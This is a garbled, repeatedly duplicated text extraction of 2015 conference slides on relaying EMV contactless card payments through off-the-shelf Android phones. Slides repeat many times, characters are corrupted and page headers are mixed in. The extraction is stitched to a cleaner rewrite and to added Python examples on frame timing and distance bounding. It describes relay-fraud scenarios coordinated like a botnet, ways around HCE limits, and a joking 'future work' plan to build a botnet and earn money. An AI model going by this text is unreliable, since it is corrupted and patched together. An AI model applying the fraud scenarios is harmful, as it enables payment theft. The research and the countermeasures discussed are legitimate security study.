https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI)
Some remarkable limitations

Limitation 1: dishonest verifier communicates with a MIFARE Classic
libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome if the NFCC is modified
EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: dishonest prover communicates with an honest verifier
Device in HCE mode: the AID must be known in advance
Overcome if the device is rooted
The Xposed framework may help to overcome this issue, but it needs root permissions

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 20: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

• Relay attacks – "On Numbers and Games", J. H. Conway (1976)
• Mafia frauds – Y. Desmedt (SecuriCom'88)

  P → V̄  ⟵ communication link ⟶  P̄ → V

• Real-time fraud where a fraudulent prover P̄ and verifier V̄ cooperate
  – Honest prover and verifier: contactless card and Point-of-Sale terminal
  – Dishonest prover and verifier: two NFC-enabled Android devices

Agenda

1 Introduction
2 Background: EMV Contactless Cards; Relay Attacks and Mafia Frauds
3 Android and NFC: A Tale of L♥ve: Evolution of NFC Support in Android; Practical Implementation Alternatives in Android
4 Relay Attack Implementation: Demo experiment; Threat Scenarios; Resistant Mechanisms
5 Related Work
6 Conclusions

Android and NFC: A Tale of L♥ve (I) – Recap on evolution of Android NFC support

(figure: timeline of NFC operation modes supported per Android version; the recoverable content follows)

• Android 2.3.3 Gingerbread (API level 10): tag technologies NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), NfcF (JIS 6319-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight. Operation modes: Reader/Writer and Peer-to-peer in software, Card-emulation in hardware.
• Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A) and IsoPcdB (ISO/IEC 14443-4B), thanks to Doug Yeager. Operation modes: Reader/Writer, Peer-to-peer and Card-emulation in software, Card-emulation in hardware.
• Android 4.2 Jelly Bean (API level 17): NfcBarcode.
• Android 4.4 KitKat (API level 19): software Card-emulation; NfcAdapter.ReaderCallback added.

Android and NFC: A Tale of L♥ve (II) – Digging into Android NFC stack

• Event-driven framework, nice API support
• Two native implementations (depending on the built-in NFC chip): libnfc-nxp, libnfc-nci
• NXP dropped in favour of NCI:
  – Open architecture, not focused on a single chip family
  – Open interface between the NFC Controller (NFCC) and the Device Host (DH)
  – Standard proposed by NFC Forum

Android and NFC: A Tale of L♥ve (III) – Digging into Android NFC stack – Reader/Writer mode

• Not allowed to be set directly → Android activity
• Android NFC service selects apps according to the tag definition in the Manifest file
• At low level, libnfc-nci uses a reliable mechanism of queues and message passing – General Kernel Interface (GKI)
  – Makes communication between layers and modules easier

(figure: call path of a tag transceive through the Android NFC stack – User App → Tag (NFC developer framework) → NfcService, mTagService.transceive → IPC → TagService → DeviceHost.TagEndPoint «realize» NativeNfcTag → JNI doTransceive → NativeNfcTag.cpp (System NFC Library) → libnfc-nci)

Android and NFC: A Tale of L♥ve (IV) – Digging into Android NFC stack – HCE mode

• A service must be implemented to process commands and replies
  – HostApduService abstract class and processCommandApdu method
• AID-based routing service table
  – This means you need to declare in advance what AID you handle

Android and NFC: A Tale of L♥ve (V) – Digging into Android NFC stack – Summary

Description                                        Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)  Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)      C/C++         Manufacturer                Yes
NFC Android kernel driver                          C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)   ARM Thumb     Hardware and manufacturer   No

Some useful links:
• https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
• https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
• https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
• https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
• http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
• http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
• http://www.datasheet4u.com/PDF/845670/BCM20793S.html
• http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI) – Some remarkable limitations

Limitation 1: dishonest verifier communicates with a MIFARE Classic
• libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
  – Caused by the CRC computation performed by the NFCC
  – Overcome if the NFCC is modified
• EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: dishonest prover communicates with an honest verifier
• Device in HCE mode: AID must be known in advance
  – Overcome if the device is rooted
  – Xposed framework may help to overcome this issue, but needs root permissions

Android and NFC: A Tale of L♥ve (V) – Some remarkable limitations and remarks

Limitation 3: dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
• ISO/IEC 14443-4 defines the Frame Waiting Time as
  $FWT = 256 \cdot (16 / f_c) \cdot 2^{FWI}$, $0 \le FWI \le 14$, where $f_c = 13.56$ MHz
• FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding remarks
• Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
• Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice :)
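As an added example (not code from the slides or the authors' app), the following Python evaluates the FWT formula above and reads the FWI from an ISO/IEC 14443-4 ATS (Answer To Select), which is where a reader learns the timing budget it must grant a card; the ATS bytes and the delay values are constructed for illustration.

```python
"""Frame Waiting Time (FWT) budget from an ISO/IEC 14443-4 ATS.

Added example; the ATS bytes below are constructed for illustration,
not captured from a real card.
"""

FC_HZ = 13_560_000          # carrier frequency fc = 13.56 MHz
FWI_DEFAULT = 4             # FWI assumed by ISO/IEC 14443-4 when TB(1) is absent
FWI_MAX = 14                # FWI = 15 is reserved for future use


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2^FWI, as defined in ISO/IEC 14443-4."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError(f"FWI {fwi} out of range 0..{FWI_MAX}")
    return 256 * (16 / FC_HZ) * (2 ** fwi)


def parse_ats(ats: bytes) -> dict:
    """Decode the interface bytes of an ATS.

    Layout: TL (total length, TL included), T0 (bits 0x10/0x20/0x40 flag
    the presence of TA(1)/TB(1)/TC(1); low nibble = FSCI), then the
    present interface bytes, then historical bytes. TB(1) carries FWI in
    its high nibble and SFGI in its low nibble.
    """
    if len(ats) < 2 or ats[0] != len(ats):
        raise ValueError("ATS length byte TL does not match the ATS length")
    t0 = ats[1]
    required = 2 + bin(t0 & 0x70).count("1")
    if len(ats) < required:
        raise ValueError("ATS shorter than its T0 presence bits claim")
    info = {"fsci": t0 & 0x0F, "fwi": FWI_DEFAULT, "sfgi": 0}
    idx = 2
    if t0 & 0x10:                       # TA(1): bit-rate capabilities
        info["ta1"] = ats[idx]
        idx += 1
    if t0 & 0x20:                       # TB(1): FWI / SFGI
        tb1 = ats[idx]
        idx += 1
        info["fwi"] = tb1 >> 4
        info["sfgi"] = tb1 & 0x0F
    if t0 & 0x40:                       # TC(1): NAD / CID support
        info["tc1"] = ats[idx]
        idx += 1
    info["historical"] = ats[idx:]
    info["fwt_s"] = fwt_seconds(info["fwi"])
    return info


def fits_in_fwt(fwi: int, extra_delay_s: float) -> bool:
    """True if a response delayed by extra_delay_s still arrives within FWT.

    This is the slack a standard reader tolerates; a bound this loose cannot
    distinguish a card on the reader from one answering through a relay.
    """
    return extra_delay_s <= fwt_seconds(fwi)


# Constructed ATS: TL=5, T0=0x78 (TA1, TB1, TC1 present, FSCI=8),
# TA1=0x80, TB1=0x80 (FWI=8, SFGI=0), TC1=0x02 (CID supported).
SAMPLE_ATS = bytes.fromhex("0578808002")

if __name__ == "__main__":
    for fwi in range(FWI_MAX + 1):
        print(f"FWI={fwi:2d}  FWT={fwt_seconds(fwi) * 1e3:10.3f} ms")
    info = parse_ats(SAMPLE_ATS)
    print(f"sample ATS: FWI={info['fwi']}, FWT={info['fwt_s'] * 1e3:.1f} ms")
```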


Relay Attack Implementation (I) – Experiment configuration

• PoS device: Ingenico IWL280 with GPRS + NFC support
• Android app developed (±2000 LOC)
• Two OTS Android NFC-capable devices
  – One constraint: only the dishonest prover must run Android ≥ 4.4

Relay Attack Implementation (II) – Threat Scenarios – Scenario 1

Distributed Mafia Fraud

(figure: a BOTMASTER coordinating several BOTs)

Relay Attack Implementation (III) – Threat Scenarios – Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV) – Resistant Mechanisms

Brief summary of resistant mechanisms
• Distance-bounding protocols
  – Upper bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
• Timing constraints
  – Not enforced in current NFC-capable systems
  – The protocol itself allows timing extension commands
• Physical countermeasures
  – Whitelisting/Blacklisting: random UID in HCE mode → unfeasible
  – RFID blocking covers
  – Physical button/switch activation
  – Secondary authentication methods (e.g. on-card fingerprint scanners)
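As an added example (not from the slides), a simulated Hancke-Kuhn style distance-bounding exchange in Python: verifier and prover derive two response registers from a shared key and exchanged nonces, then run single-bit challenge/response rounds, and the verifier rejects if any response bit is wrong or any round-trip time exceeds the bound derived from the maximum allowed distance. Time is simulated through a one-way link delay parameter rather than measured on hardware; the key, nonces and delays are constructed.

```python
"""Simulated distance-bounding round (added example, not from the slides).

A verifier (PoS role) bounds the prover's (card role) distance by timing
single-bit challenge/response rounds. Responses come from key-derived
registers, so a relay can neither answer early nor forge them, and a
relayed answer arrives late. Timing is simulated with a one-way link
delay parameter; keys, nonces and delays are constructed.
"""
import hashlib
import hmac
import random

SPEED_OF_LIGHT_M_S = 299_792_458.0


def max_rtt_seconds(max_distance_m: float, processing_allowance_s: float) -> float:
    """Round-trip bound: signal out and back over max_distance_m, plus a
    fixed allowance for the prover's processing."""
    return 2.0 * max_distance_m / SPEED_OF_LIGHT_M_S + processing_allowance_s


def response_registers(key: bytes, nonce_v: bytes, nonce_p: bytes, rounds: int):
    """Derive the bit registers R0 and R1 (Hancke-Kuhn style) from an HMAC
    over both nonces; the prover answers round i with R0[i] or R1[i]
    depending on the challenge bit."""
    digest = hmac.new(key, nonce_v + nonce_p, hashlib.sha256).digest()
    bits = [(byte >> i) & 1 for byte in digest for i in range(8)]
    if 2 * rounds > len(bits):
        raise ValueError("too many rounds for one SHA-256 digest")
    return bits[:rounds], bits[rounds:2 * rounds]


class Prover:
    def __init__(self, key: bytes, seed: int = 0):
        self.key = key
        self.rng = random.Random(seed)   # seeded so the example is deterministic

    def commit(self, nonce_v: bytes, rounds: int) -> bytes:
        """Slow phase: pick the prover nonce and precompute both registers."""
        self.nonce_p = self.rng.getrandbits(128).to_bytes(16, "big")
        self.r0, self.r1 = response_registers(self.key, nonce_v, self.nonce_p, rounds)
        return self.nonce_p

    def respond(self, i: int, challenge_bit: int) -> int:
        return self.r0[i] if challenge_bit == 0 else self.r1[i]


class Verifier:
    def __init__(self, key: bytes, rounds: int = 32, max_distance_m: float = 0.1,
                 processing_allowance_s: float = 1e-6, seed: int = 1):
        self.key = key
        self.rounds = rounds
        self.bound_s = max_rtt_seconds(max_distance_m, processing_allowance_s)
        self.rng = random.Random(seed)

    def run(self, prover: Prover, one_way_delay_s: float,
            prover_processing_s: float = 5e-7) -> dict:
        """Slow phase (nonce exchange) followed by the rapid bit exchange.
        one_way_delay_s models the physical link or relay latency in each
        direction; the round-trip time is simulated, not measured."""
        nonce_v = self.rng.getrandbits(128).to_bytes(16, "big")
        nonce_p = prover.commit(nonce_v, self.rounds)
        r0, r1 = response_registers(self.key, nonce_v, nonce_p, self.rounds)
        wrong_bits = slow_rounds = 0
        for i in range(self.rounds):
            challenge = self.rng.getrandbits(1)
            rtt_s = 2.0 * one_way_delay_s + prover_processing_s
            answer = prover.respond(i, challenge)
            expected = r0[i] if challenge == 0 else r1[i]
            wrong_bits += answer != expected
            slow_rounds += rtt_s > self.bound_s
        return {
            "accepted": wrong_bits == 0 and slow_rounds == 0,
            "wrong_bits": wrong_bits,
            "slow_rounds": slow_rounds,
            "bound_s": self.bound_s,
        }


SHARED_KEY = b"constructed-shared-key"   # constructed, for illustration only


def run_protocol(one_way_delay_s: float, prover_key: bytes = SHARED_KEY) -> dict:
    """Run one session between a fresh verifier and prover; passing a
    different prover_key models a prover that does not hold the key."""
    return Verifier(SHARED_KEY).run(Prover(prover_key), one_way_delay_s)


if __name__ == "__main__":
    card_on_reader = run_protocol(0.05 / SPEED_OF_LIGHT_M_S)   # card 5 cm away
    relayed = run_protocol(0.02)                                 # 20 ms each way over a network link
    print("card on reader:", card_on_reader)
    print("relayed card  :", relayed)
```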


Related Work – On relay attacks

• 2005–2009: First works built on specific hardware
• 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
• 2012–2013: Relay attacks on Android accessing Secure Elements
  – A SE securely stores data associated with credit/debit cards
  – Needs a non-OTS Android device
• 2014: Active relay attacks with custom hardware and custom Android firmware
• Several works studied the delay over the relay channel
  – Relays over long distances are feasible → latency isn't a hard constraint

Ask us for specific references, too many names for a single slide!


Conclusions (I)

• Security of NFC is based on the physical proximity concern
• NFC threats: eavesdropping, data modification, relay attacks
• Android NFC-capable devices are rising
  – Abuse to interact with cards in their proximity

Conclusions
• Review of the Android NFC stack
• Proof-of-Concept of relay attacks using Android OTS devices
• Threat scenarios introduced
• Virtual pickpocketing attack may appear before long

Conclusions (II) – But then, what the hell can I do? Should I run away?

Conclusions (III)

Future Work
• Develop a botnet infrastructure and earn money
• Timing constraints of Android HCE mode
• Try active relay attacks within EMV contactless cards

Acknowledgments
• Spanish National Cybersecurity Institute (INCIBE)
• University of León, under contract X43
• HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 21: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

